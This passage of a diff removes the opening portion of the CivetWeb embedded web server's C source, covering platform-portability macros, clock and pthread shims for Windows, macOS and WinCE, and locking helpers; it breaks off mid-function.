- * Copyright (c) 2004-2013 Sergey Lyubka
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#if defined(_WIN32)
-#if !defined(_CRT_SECURE_NO_WARNINGS)
-#define _CRT_SECURE_NO_WARNINGS /* Disable deprecation warning in VS2005 */
-#endif
-#ifndef _WIN32_WINNT /* defined for tdm-gcc so we can use getnameinfo */
-#define _WIN32_WINNT 0x0501
-#endif
-#else
-#if defined(__GNUC__) && !defined(_GNU_SOURCE)
-#define _GNU_SOURCE /* for setgroups() */
-#endif
-#if defined(__linux__) && !defined(_XOPEN_SOURCE)
-#define _XOPEN_SOURCE 600 /* For flockfile() on Linux */
-#endif
-#ifndef _LARGEFILE_SOURCE
-#define _LARGEFILE_SOURCE /* For fseeko(), ftello() */
-#endif
-#ifndef _FILE_OFFSET_BITS
-#define _FILE_OFFSET_BITS 64 /* Use 64-bit file offsets by default */
-#endif
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS /* <inttypes.h> wants this for C++ */
-#endif
-#ifndef __STDC_LIMIT_MACROS
-#define __STDC_LIMIT_MACROS /* C++ wants that for INT64_MAX */
-#endif
-#ifdef __sun
-#define __EXTENSIONS__  /* to expose flockfile and friends in stdio.h */
-#define __inline inline /* not recognized on older compiler versions */
-#endif
-#endif
-
-#if defined(USE_LUA)
-#define USE_TIMERS
-#endif
-
-#if defined(_MSC_VER)
-/* 'type cast' : conversion from 'int' to 'HANDLE' of greater size */
-#pragma warning(disable : 4306)
-/* conditional expression is constant: introduced by FD_SET(..) */
-#pragma warning(disable : 4127)
-/* non-constant aggregate initializer: issued due to missing C99 support */
-#pragma warning(disable : 4204)
-/* padding added after data member */
-#pragma warning(disable : 4820)
-/* not defined as a preprocessor macro, replacing with '0' for '#if/#elif' */
-#pragma warning(disable : 4668)
-/* no function prototype given: converting '()' to '(void)' */
-#pragma warning(disable : 4255)
-/* function has been selected for automatic inline expansion */
-#pragma warning(disable : 4711)
-#endif
-
-
-/* This code uses static_assert to check some conditions.
- * Unfortunately some compilers still do not support it, so we have a
- * replacement function here. */
-#if defined(_MSC_VER) && (_MSC_VER >= 1600)
-#define mg_static_assert static_assert
-#elif defined(__cplusplus) && (__cplusplus >= 201103L)
-#define mg_static_assert static_assert
-#elif defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 201112L)
-#define mg_static_assert _Static_assert
-#else
-char static_assert_replacement[1];
-#define mg_static_assert(cond, txt)                                            \
-	extern char static_assert_replacement[(cond) ? 1 : -1]
-#endif
-
-mg_static_assert(sizeof(int) == 4 || sizeof(int) == 8,
-                 "int data type size check");
-mg_static_assert(sizeof(void *) == 4 || sizeof(void *) == 8,
-                 "pointer data type size check");
-mg_static_assert(sizeof(void *) >= sizeof(int), "data type size check");
-
-
-/* Alternative queue is well tested and should be the new default */
-#ifdef NO_ALTERNATIVE_QUEUE
-#ifdef ALTERNATIVE_QUEUE
-#error "Define ALTERNATIVE_QUEUE or NO_ALTERNATIVE_QUEUE or none, but not both"
-#endif
-#else
-#define ALTERNATIVE_QUEUE
-#endif
-
-
-/* DTL -- including winsock2.h works better if lean and mean */
-#ifndef WIN32_LEAN_AND_MEAN
-#define WIN32_LEAN_AND_MEAN
-#endif
-
-#if defined(__SYMBIAN32__)
-/* According to https://en.wikipedia.org/wiki/Symbian#History,
- * Symbian is no longer maintained since 2014-01-01.
- * Recent versions of CivetWeb are no longer tested for Symbian.
- * It makes no sense, to support an abandoned operating system.
- * All remaining "#ifdef __SYMBIAN__" cases will be droped from
- * the code sooner or later.
- */
-#pragma message                                                                \
-    "Symbian is no longer maintained. CivetWeb will drop Symbian support."
-#define NO_SSL /* SSL is not supported */
-#define NO_CGI /* CGI is not supported */
-#define PATH_MAX FILENAME_MAX
-#endif /* __SYMBIAN32__ */
-
-
-#ifndef CIVETWEB_HEADER_INCLUDED
-/* Include the header file here, so the CivetWeb interface is defined for the
- * entire implementation, including the following forward definitions. */
-#include "civetweb.h"
-#endif
-
-
-#ifndef IGNORE_UNUSED_RESULT
-#define IGNORE_UNUSED_RESULT(a) ((void)((a) && 1))
-#endif
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-
-/* GCC unused function attribute seems fundamentally broken.
- * Several attempts to tell the compiler "THIS FUNCTION MAY BE USED
- * OR UNUSED" for individual functions failed.
- * Either the compiler creates an "unused-function" warning if a
- * function is not marked with __attribute__((unused)).
- * On the other hand, if the function is marked with this attribute,
- * but is used, the compiler raises a completely idiotic
- * "used-but-marked-unused" warning - and
- *   #pragma GCC diagnostic ignored "-Wused-but-marked-unused"
- * raises error: unknown option after ‘#pragma GCC diagnostic’.
- * Disable this warning completely, until the GCC guys sober up
- * again.
- */
-
-#pragma GCC diagnostic ignored "-Wunused-function"
-
-#define FUNCTION_MAY_BE_UNUSED /* __attribute__((unused)) */
-
-#else
-#define FUNCTION_MAY_BE_UNUSED
-#endif
-
-
-#ifndef _WIN32_WCE /* Some ANSI #includes are not available on Windows CE */
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <errno.h>
-#include <signal.h>
-#include <fcntl.h>
-#endif /* !_WIN32_WCE */
-
-
-#ifdef __clang__
-/* When using -Weverything, clang does not accept it's own headers
- * in a release build configuration. Disable what is too much in
- * -Weverything. */
-#pragma clang diagnostic ignored "-Wdisabled-macro-expansion"
-#endif
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Who on earth came to the conclusion, using __DATE__ should rise
- * an "expansion of date or time macro is not reproducible"
- * warning. That's exactly what was intended by using this macro.
- * Just disable this nonsense warning. */
-
-/* And disabling them does not work either:
- * #pragma clang diagnostic ignored "-Wno-error=date-time"
- * #pragma clang diagnostic ignored "-Wdate-time"
- * So we just have to disable ALL warnings for some lines
- * of code.
- */
-#endif
-
-
-#ifdef __MACH__ /* Apple OSX section */
-
-#ifdef __clang__
-#if (__clang_major__ == 3) && ((__clang_minor__ == 7) || (__clang_minor__ == 8))
-/* Avoid warnings for Xcode 7. It seems it does no longer exist in Xcode 8 */
-#pragma clang diagnostic ignored "-Wno-reserved-id-macro"
-#pragma clang diagnostic ignored "-Wno-keyword-macro"
-#endif
-#endif
-
-#define CLOCK_MONOTONIC (1)
-#define CLOCK_REALTIME (2)
-
-#include <sys/errno.h>
-#include <sys/time.h>
-#include <mach/clock.h>
-#include <mach/mach.h>
-#include <mach/mach_time.h>
-#include <assert.h>
-
-/* clock_gettime is not implemented on OSX prior to 10.12 */
-static int
-_civet_clock_gettime(int clk_id, struct timespec *t)
-{
-	memset(t, 0, sizeof(*t));
-	if (clk_id == CLOCK_REALTIME) {
-		struct timeval now;
-		int rv = gettimeofday(&now, NULL);
-		if (rv) {
-			return rv;
-		}
-		t->tv_sec = now.tv_sec;
-		t->tv_nsec = now.tv_usec * 1000;
-		return 0;
-
-	} else if (clk_id == CLOCK_MONOTONIC) {
-		static uint64_t clock_start_time = 0;
-		static mach_timebase_info_data_t timebase_ifo = {0, 0};
-
-		uint64_t now = mach_absolute_time();
-
-		if (clock_start_time == 0) {
-			kern_return_t mach_status = mach_timebase_info(&timebase_ifo);
-#if defined(DEBUG)
-			assert(mach_status == KERN_SUCCESS);
-#else
-			/* appease "unused variable" warning for release builds */
-			(void)mach_status;
-#endif
-			clock_start_time = now;
-		}
-
-		now = (uint64_t)((double)(now - clock_start_time)
-		                 * (double)timebase_ifo.numer
-		                 / (double)timebase_ifo.denom);
-
-		t->tv_sec = now / 1000000000;
-		t->tv_nsec = now % 1000000000;
-		return 0;
-	}
-	return -1; /* EINVAL - Clock ID is unknown */
-}
-
-/* if clock_gettime is declared, then __CLOCK_AVAILABILITY will be defined */
-#ifdef __CLOCK_AVAILABILITY
-/* If we compiled with Mac OSX 10.12 or later, then clock_gettime will be
- * declared but it may be NULL at runtime. So we need to check before using
- * it. */
-static int
-_civet_safe_clock_gettime(int clk_id, struct timespec *t)
-{
-	if (clock_gettime) {
-		return clock_gettime(clk_id, t);
-	}
-	return _civet_clock_gettime(clk_id, t);
-}
-#define clock_gettime _civet_safe_clock_gettime
-#else
-#define clock_gettime _civet_clock_gettime
-#endif
-
-#endif
-
-
-#include <time.h>
-#include <stdlib.h>
-#include <stdarg.h>
-#include <assert.h>
-#include <string.h>
-#include <ctype.h>
-#include <limits.h>
-#include <stddef.h>
-#include <stdio.h>
-#include <stdint.h>
-
-#ifndef INT64_MAX
-#define INT64_MAX (9223372036854775807)
-#endif
-
-
-#ifndef MAX_WORKER_THREADS
-#define MAX_WORKER_THREADS (1024 * 64)
-#endif
-
-#ifndef SOCKET_TIMEOUT_QUANTUM /* in ms */
-#define SOCKET_TIMEOUT_QUANTUM (2000)
-#endif
-
-#define SHUTDOWN_RD (0)
-#define SHUTDOWN_WR (1)
-#define SHUTDOWN_BOTH (2)
-
-mg_static_assert(MAX_WORKER_THREADS >= 1,
-                 "worker threads must be a positive number");
-
-mg_static_assert(sizeof(size_t) == 4 || sizeof(size_t) == 8,
-                 "size_t data type size check");
-
-#if defined(_WIN32)                                                            \
-    && !defined(__SYMBIAN32__) /* WINDOWS / UNIX include block */
-#include <windows.h>
-#include <winsock2.h> /* DTL add for SO_EXCLUSIVE */
-#include <ws2tcpip.h>
-
-typedef const char *SOCK_OPT_TYPE;
-
-#if !defined(PATH_MAX)
-#define PATH_MAX (MAX_PATH)
-#endif
-
-#if !defined(PATH_MAX)
-#define PATH_MAX (4096)
-#endif
-
-mg_static_assert(PATH_MAX >= 1, "path length must be a positive number");
-
-#ifndef _IN_PORT_T
-#ifndef in_port_t
-#define in_port_t u_short
-#endif
-#endif
-
-#ifndef _WIN32_WCE
-#include <process.h>
-#include <direct.h>
-#include <io.h>
-#else            /* _WIN32_WCE */
-#define NO_CGI   /* WinCE has no pipes */
-#define NO_POPEN /* WinCE has no popen */
-
-typedef long off_t;
-
-#define errno ((int)(GetLastError()))
-#define strerror(x) (_ultoa(x, (char *)_alloca(sizeof(x) * 3), 10))
-#endif /* _WIN32_WCE */
-
-#define MAKEUQUAD(lo, hi)                                                      \
-	((uint64_t)(((uint32_t)(lo)) | ((uint64_t)((uint32_t)(hi))) << 32))
-#define RATE_DIFF (10000000) /* 100 nsecs */
-#define EPOCH_DIFF (MAKEUQUAD(0xd53e8000, 0x019db1de))
-#define SYS2UNIX_TIME(lo, hi)                                                  \
-	((time_t)((MAKEUQUAD((lo), (hi)) - EPOCH_DIFF) / RATE_DIFF))
-
-/* Visual Studio 6 does not know __func__ or __FUNCTION__
- * The rest of MS compilers use __FUNCTION__, not C99 __func__
- * Also use _strtoui64 on modern M$ compilers */
-#if defined(_MSC_VER)
-#if (_MSC_VER < 1300)
-#define STRX(x) #x
-#define STR(x) STRX(x)
-#define __func__ __FILE__ ":" STR(__LINE__)
-#define strtoull(x, y, z) ((unsigned __int64)_atoi64(x))
-#define strtoll(x, y, z) (_atoi64(x))
-#else
-#define __func__ __FUNCTION__
-#define strtoull(x, y, z) (_strtoui64(x, y, z))
-#define strtoll(x, y, z) (_strtoi64(x, y, z))
-#endif
-#endif /* _MSC_VER */
-
-#define ERRNO ((int)(GetLastError()))
-#define NO_SOCKLEN_T
-
-#if defined(_WIN64) || defined(__MINGW64__)
-#define SSL_LIB "ssleay64.dll"
-#define CRYPTO_LIB "libeay64.dll"
-#else
-#define SSL_LIB "ssleay32.dll"
-#define CRYPTO_LIB "libeay32.dll"
-#endif
-
-#define O_NONBLOCK (0)
-#ifndef W_OK
-#define W_OK (2) /* http://msdn.microsoft.com/en-us/library/1w06ktdy.aspx */
-#endif
-#if !defined(EWOULDBLOCK)
-#define EWOULDBLOCK WSAEWOULDBLOCK
-#endif /* !EWOULDBLOCK */
-#define _POSIX_
-#define INT64_FMT "I64d"
-#define UINT64_FMT "I64u"
-
-#define WINCDECL __cdecl
-#define vsnprintf_impl _vsnprintf
-#define access _access
-#define mg_sleep(x) (Sleep(x))
-
-#define pipe(x) _pipe(x, MG_BUF_LEN, _O_BINARY)
-#ifndef popen
-#define popen(x, y) (_popen(x, y))
-#endif
-#ifndef pclose
-#define pclose(x) (_pclose(x))
-#endif
-#define close(x) (_close(x))
-#define dlsym(x, y) (GetProcAddress((HINSTANCE)(x), (y)))
-#define RTLD_LAZY (0)
-#define fseeko(x, y, z) ((_lseeki64(_fileno(x), (y), (z)) == -1) ? -1 : 0)
-#define fdopen(x, y) (_fdopen((x), (y)))
-#define write(x, y, z) (_write((x), (y), (unsigned)z))
-#define read(x, y, z) (_read((x), (y), (unsigned)z))
-#define flockfile(x) (EnterCriticalSection(&global_log_file_lock))
-#define funlockfile(x) (LeaveCriticalSection(&global_log_file_lock))
-#define sleep(x) (Sleep((x)*1000))
-#define rmdir(x) (_rmdir(x))
-#define timegm(x) (_mkgmtime(x))
-
-#if !defined(fileno)
-#define fileno(x) (_fileno(x))
-#endif /* !fileno MINGW #defines fileno */
-
-typedef HANDLE pthread_mutex_t;
-typedef DWORD pthread_key_t;
-typedef HANDLE pthread_t;
-typedef struct {
-	CRITICAL_SECTION threadIdSec;
-	struct mg_workerTLS *waiting_thread; /* The chain of threads */
-} pthread_cond_t;
-
-#ifndef __clockid_t_defined
-typedef DWORD clockid_t;
-#endif
-#ifndef CLOCK_MONOTONIC
-#define CLOCK_MONOTONIC (1)
-#endif
-#ifndef CLOCK_REALTIME
-#define CLOCK_REALTIME (2)
-#endif
-#ifndef CLOCK_THREAD
-#define CLOCK_THREAD (3)
-#endif
-#ifndef CLOCK_PROCESS
-#define CLOCK_PROCESS (4)
-#endif
-
-
-#if defined(_MSC_VER) && (_MSC_VER >= 1900)
-#define _TIMESPEC_DEFINED
-#endif
-#ifndef _TIMESPEC_DEFINED
-struct timespec {
-	time_t tv_sec; /* seconds */
-	long tv_nsec;  /* nanoseconds */
-};
-#endif
-
-#if !defined(WIN_PTHREADS_TIME_H)
-#define MUST_IMPLEMENT_CLOCK_GETTIME
-#endif
-
-#ifdef MUST_IMPLEMENT_CLOCK_GETTIME
-#define clock_gettime mg_clock_gettime
-static int
-clock_gettime(clockid_t clk_id, struct timespec *tp)
-{
-	FILETIME ft;
-	ULARGE_INTEGER li, li2;
-	BOOL ok = FALSE;
-	double d;
-	static double perfcnt_per_sec = 0.0;
-
-	if (tp) {
-		memset(tp, 0, sizeof(*tp));
-
-		if (clk_id == CLOCK_REALTIME) {
-
-			/* BEGIN: CLOCK_REALTIME = wall clock (date and time) */
-			GetSystemTimeAsFileTime(&ft);
-			li.LowPart = ft.dwLowDateTime;
-			li.HighPart = ft.dwHighDateTime;
-			li.QuadPart -= 116444736000000000; /* 1.1.1970 in filedate */
-			tp->tv_sec = (time_t)(li.QuadPart / 10000000);
-			tp->tv_nsec = (long)(li.QuadPart % 10000000) * 100;
-			ok = TRUE;
-			/* END: CLOCK_REALTIME */
-
-		} else if (clk_id == CLOCK_MONOTONIC) {
-
-			/* BEGIN: CLOCK_MONOTONIC = stopwatch (time differences) */
-			if (perfcnt_per_sec == 0.0) {
-				QueryPerformanceFrequency((LARGE_INTEGER *)&li);
-				perfcnt_per_sec = 1.0 / li.QuadPart;
-			}
-			if (perfcnt_per_sec != 0.0) {
-				QueryPerformanceCounter((LARGE_INTEGER *)&li);
-				d = li.QuadPart * perfcnt_per_sec;
-				tp->tv_sec = (time_t)d;
-				d -= tp->tv_sec;
-				tp->tv_nsec = (long)(d * 1.0E9);
-				ok = TRUE;
-			}
-			/* END: CLOCK_MONOTONIC */
-
-		} else if (clk_id == CLOCK_THREAD) {
-
-			/* BEGIN: CLOCK_THREAD = CPU usage of thread */
-			FILETIME t_create, t_exit, t_kernel, t_user;
-			if (GetThreadTimes(GetCurrentThread(),
-			                   &t_create,
-			                   &t_exit,
-			                   &t_kernel,
-			                   &t_user)) {
-				li.LowPart = t_user.dwLowDateTime;
-				li.HighPart = t_user.dwHighDateTime;
-				li2.LowPart = t_kernel.dwLowDateTime;
-				li2.HighPart = t_kernel.dwHighDateTime;
-				li.QuadPart += li2.QuadPart;
-				tp->tv_sec = (time_t)(li.QuadPart / 10000000);
-				tp->tv_nsec = (long)(li.QuadPart % 10000000) * 100;
-				ok = TRUE;
-			}
-			/* END: CLOCK_THREAD */
-
-		} else if (clk_id == CLOCK_PROCESS) {
-
-			/* BEGIN: CLOCK_PROCESS = CPU usage of process */
-			FILETIME t_create, t_exit, t_kernel, t_user;
-			if (GetProcessTimes(GetCurrentProcess(),
-			                    &t_create,
-			                    &t_exit,
-			                    &t_kernel,
-			                    &t_user)) {
-				li.LowPart = t_user.dwLowDateTime;
-				li.HighPart = t_user.dwHighDateTime;
-				li2.LowPart = t_kernel.dwLowDateTime;
-				li2.HighPart = t_kernel.dwHighDateTime;
-				li.QuadPart += li2.QuadPart;
-				tp->tv_sec = (time_t)(li.QuadPart / 10000000);
-				tp->tv_nsec = (long)(li.QuadPart % 10000000) * 100;
-				ok = TRUE;
-			}
-			/* END: CLOCK_PROCESS */
-
-		} else {
-
-			/* BEGIN: unknown clock */
-			/* ok = FALSE; already set by init */
-			/* END: unknown clock */
-		}
-	}
-
-	return ok ? 0 : -1;
-}
-#endif
-
-
-#define pid_t HANDLE /* MINGW typedefs pid_t to int. Using #define here. */
-
-static int pthread_mutex_lock(pthread_mutex_t *);
-static int pthread_mutex_unlock(pthread_mutex_t *);
-static void path_to_unicode(const struct mg_connection *conn,
-                            const char *path,
-                            wchar_t *wbuf,
-                            size_t wbuf_len);
-
-/* All file operations need to be rewritten to solve #246. */
-
-#include "file_ops.inl"
-
-struct mg_file;
-
-static const char *
-mg_fgets(char *buf, size_t size, struct mg_file *filep, char **p);
-
-
-/* POSIX dirent interface */
-struct dirent {
-	char d_name[PATH_MAX];
-};
-
-typedef struct DIR {
-	HANDLE handle;
-	WIN32_FIND_DATAW info;
-	struct dirent result;
-} DIR;
-
-#if defined(_WIN32) && !defined(POLLIN)
-#ifndef HAVE_POLL
-struct pollfd {
-	SOCKET fd;
-	short events;
-	short revents;
-};
-#define POLLIN (0x0300)
-#endif
-#endif
-
-/* Mark required libraries */
-#if defined(_MSC_VER)
-#pragma comment(lib, "Ws2_32.lib")
-#endif
-
-#else /* defined(_WIN32) && !defined(__SYMBIAN32__) -                          \
-         WINDOWS / UNIX include block */
-
-#include <sys/wait.h>
-#include <sys/socket.h>
-#include <sys/poll.h>
-#include <netinet/in.h>
-#include <arpa/inet.h>
-#include <sys/time.h>
-#include <sys/utsname.h>
-#include <stdint.h>
-#include <inttypes.h>
-#include <netdb.h>
-#include <netinet/tcp.h>
-typedef const void *SOCK_OPT_TYPE;
-
-#if defined(ANDROID)
-typedef unsigned short int in_port_t;
-#endif
-
-#include <pwd.h>
-#include <unistd.h>
-#include <grp.h>
-#include <dirent.h>
-#define vsnprintf_impl vsnprintf
-
-#if !defined(NO_SSL_DL) && !defined(NO_SSL)
-#include <dlfcn.h>
-#endif
-#include <pthread.h>
-#if defined(__MACH__)
-#define SSL_LIB "libssl.dylib"
-#define CRYPTO_LIB "libcrypto.dylib"
-#else
-#if !defined(SSL_LIB)
-#define SSL_LIB "libssl.so"
-#endif
-#if !defined(CRYPTO_LIB)
-#define CRYPTO_LIB "libcrypto.so"
-#endif
-#endif
-#ifndef O_BINARY
-#define O_BINARY (0)
-#endif /* O_BINARY */
-#define closesocket(a) (close(a))
-#define mg_mkdir(conn, path, mode) (mkdir(path, mode))
-#define mg_remove(conn, x) (remove(x))
-#define mg_sleep(x) (usleep((x)*1000))
-#define mg_opendir(conn, x) (opendir(x))
-#define mg_closedir(x) (closedir(x))
-#define mg_readdir(x) (readdir(x))
-#define ERRNO (errno)
-#define INVALID_SOCKET (-1)
-#define INT64_FMT PRId64
-#define UINT64_FMT PRIu64
-typedef int SOCKET;
-#define WINCDECL
-
-#if defined(__hpux)
-/* HPUX 11 does not have monotonic, fall back to realtime */
-#ifndef CLOCK_MONOTONIC
-#define CLOCK_MONOTONIC CLOCK_REALTIME
-#endif
-
-/* HPUX defines socklen_t incorrectly as size_t which is 64bit on
- * Itanium.  Without defining _XOPEN_SOURCE or _XOPEN_SOURCE_EXTENDED
- * the prototypes use int* rather than socklen_t* which matches the
- * actual library expectation.  When called with the wrong size arg
- * accept() returns a zero client inet addr and check_acl() always
- * fails.  Since socklen_t is widely used below, just force replace
- * their typedef with int. - DTL
- */
-#define socklen_t int
-#endif /* hpux */
-
-#endif /* defined(_WIN32) && !defined(__SYMBIAN32__) -                         \
-          WINDOWS / UNIX include block */
-
-/* va_copy should always be a macro, C99 and C++11 - DTL */
-#ifndef va_copy
-#define va_copy(x, y) ((x) = (y))
-#endif
-
-#ifdef _WIN32
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-static CRITICAL_SECTION global_log_file_lock;
-
-FUNCTION_MAY_BE_UNUSED
-static DWORD
-pthread_self(void)
-{
-	return GetCurrentThreadId();
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_key_create(
-    pthread_key_t *key,
-    void (*_ignored)(void *) /* destructor not supported for Windows */
-    )
-{
-	(void)_ignored;
-
-	if ((key != 0)) {
-		*key = TlsAlloc();
-		return (*key != TLS_OUT_OF_INDEXES) ? 0 : -1;
-	}
-	return -2;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_key_delete(pthread_key_t key)
-{
-	return TlsFree(key) ? 0 : 1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_setspecific(pthread_key_t key, void *value)
-{
-	return TlsSetValue(key, value) ? 0 : 1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static void *
-pthread_getspecific(pthread_key_t key)
-{
-	return TlsGetValue(key);
-}
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-static struct pthread_mutex_undefined_struct *pthread_mutex_attr = NULL;
-#else
-static pthread_mutexattr_t pthread_mutex_attr;
-#endif /* _WIN32 */
-
-
-#define PASSWORDS_FILE_NAME ".htpasswd"
-#define CGI_ENVIRONMENT_SIZE (4096)
-#define MAX_CGI_ENVIR_VARS (256)
-#define MG_BUF_LEN (8192)
-
-#define ARRAY_SIZE(array) (sizeof(array) / sizeof(array[0]))
-
-
-#if defined(_WIN32_WCE)
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static time_t
-time(time_t *ptime)
-{
-	time_t t;
-	SYSTEMTIME st;
-	FILETIME ft;
-
-	GetSystemTime(&st);
-	SystemTimeToFileTime(&st, &ft);
-	t = SYS2UNIX_TIME(ft.dwLowDateTime, ft.dwHighDateTime);
-
-	if (ptime != NULL) {
-		*ptime = t;
-	}
-
-	return t;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-localtime_s(const time_t *ptime, struct tm *ptm)
-{
-	int64_t t = ((int64_t)*ptime) * RATE_DIFF + EPOCH_DIFF;
-	FILETIME ft, lft;
-	SYSTEMTIME st;
-	TIME_ZONE_INFORMATION tzinfo;
-
-	if (ptm == NULL) {
-		return NULL;
-	}
-
-	*(int64_t *)&ft = t;
-	FileTimeToLocalFileTime(&ft, &lft);
-	FileTimeToSystemTime(&lft, &st);
-	ptm->tm_year = st.wYear - 1900;
-	ptm->tm_mon = st.wMonth - 1;
-	ptm->tm_wday = st.wDayOfWeek;
-	ptm->tm_mday = st.wDay;
-	ptm->tm_hour = st.wHour;
-	ptm->tm_min = st.wMinute;
-	ptm->tm_sec = st.wSecond;
-	ptm->tm_yday = 0; /* hope nobody uses this */
-	ptm->tm_isdst =
-	    (GetTimeZoneInformation(&tzinfo) == TIME_ZONE_ID_DAYLIGHT) ? 1 : 0;
-
-	return ptm;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-gmtime_s(const time_t *ptime, struct tm *ptm)
-{
-	/* FIXME(lsm): fix this. */
-	return localtime_s(ptime, ptm);
-}
-
-
-static int mg_atomic_inc(volatile int *addr);
-static struct tm tm_array[MAX_WORKER_THREADS];
-static int tm_index = 0;
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-localtime(const time_t *ptime)
-{
-	int i = mg_atomic_inc(&tm_index) % (sizeof(tm_array) / sizeof(tm_array[0]));
-	return localtime_s(ptime, tm_array + i);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-gmtime(const time_t *ptime)
-{
-	int i = mg_atomic_inc(&tm_index) % ARRAY_SIZE(tm_array);
-	return gmtime_s(ptime, tm_array + i);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static size_t
-strftime(char *dst, size_t dst_size, const char *fmt, const struct tm *tm)
-{
-	/* TODO: (void)mg_snprintf(NULL, dst, dst_size, "implement strftime()
-	 * for WinCE"); */
-	return 0;
-}
-
-#define _beginthreadex(psec, stack, func, prm, flags, ptid)                    \
-	(uintptr_t) CreateThread(psec, stack, func, prm, flags, ptid)
-
-#define remove(f) mg_remove(NULL, f)
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-rename(const char *a, const char *b)
-{
-	wchar_t wa[PATH_MAX];
-	wchar_t wb[PATH_MAX];
-	path_to_unicode(NULL, a, wa, ARRAY_SIZE(wa));
-	path_to_unicode(NULL, b, wb, ARRAY_SIZE(wb));
-
-	return MoveFileW(wa, wb) ? 0 : -1;
-}
-
-
-struct stat {
-	int64_t st_size;
-	time_t st_mtime;
-};
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-stat(const char *name, struct stat *st)
-{
-	wchar_t wbuf[PATH_MAX];
-	WIN32_FILE_ATTRIBUTE_DATA attr;
-	time_t creation_time, write_time;
-
-	path_to_unicode(NULL, name, wbuf, ARRAY_SIZE(wbuf));
-	memset(&attr, 0, sizeof(attr));
-
-	GetFileAttributesExW(wbuf, GetFileExInfoStandard, &attr);
-	st->st_size =
-	    (((int64_t)attr.nFileSizeHigh) << 32) + (int64_t)attr.nFileSizeLow;
-
-	write_time = SYS2UNIX_TIME(attr.ftLastWriteTime.dwLowDateTime,
-	                           attr.ftLastWriteTime.dwHighDateTime);
-	creation_time = SYS2UNIX_TIME(attr.ftCreationTime.dwLowDateTime,
-	                              attr.ftCreationTime.dwHighDateTime);
-
-	if (creation_time > write_time) {
-		st->st_mtime = creation_time;
-	} else {
-		st->st_mtime = write_time;
-	}
-	return 0;
-}
-
-#define access(x, a) 1 /* not required anyway */
-
-/* WinCE-TODO: define stat, remove, rename, _rmdir, _lseeki64 */
-/* Values from errno.h in Windows SDK (Visual Studio). */
-#define EEXIST 17
-#define EACCES 13
-#define ENOENT 2
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-#endif /* defined(_WIN32_WCE) */
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#define GCC_VERSION                                                            \
-	(__GNUC__ * 10000 + __GNUC_MINOR__ * 100 + __GNUC_PATCHLEVEL__)
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunused-function"
-#endif
-
-static pthread_mutex_t global_lock_mutex;
-
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-/* Forward declaration for Windows */
-FUNCTION_MAY_BE_UNUSED
-static int pthread_mutex_lock(pthread_mutex_t *mutex);
-
-FUNCTION_MAY_BE_UNUSED
-static int pthread_mutex_unlock(pthread_mutex_t *mutex);
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static void
-mg_global_lock(void)
-{
-	(void)pthread_mutex_lock(&global_lock_mutex);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static void
-mg_global_unlock(void)
-{
-	(void)pthread_mutex_unlock(&global_lock_mutex);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-mg_atomic_inc(volatile int *addr)
-{
-	int ret;
-#if defined(_WIN32) && !defined(__SYMBIAN32__) && !defined(NO_ATOMICS)
-	/* Depending on the SDK, this function uses either
-	 * (volatile unsigned int *) or (volatile LONG *),
-	 * so whatever you use, the other SDK is likely to raise a warning. */
-	ret = InterlockedIncrement((volatile long *)addr);
-#elif defined(__GNUC__)                                                        \
-    && ((__GNUC__ > 4) || ((__GNUC__ == 4) && (__GNUC_MINOR__ > 0)))           \
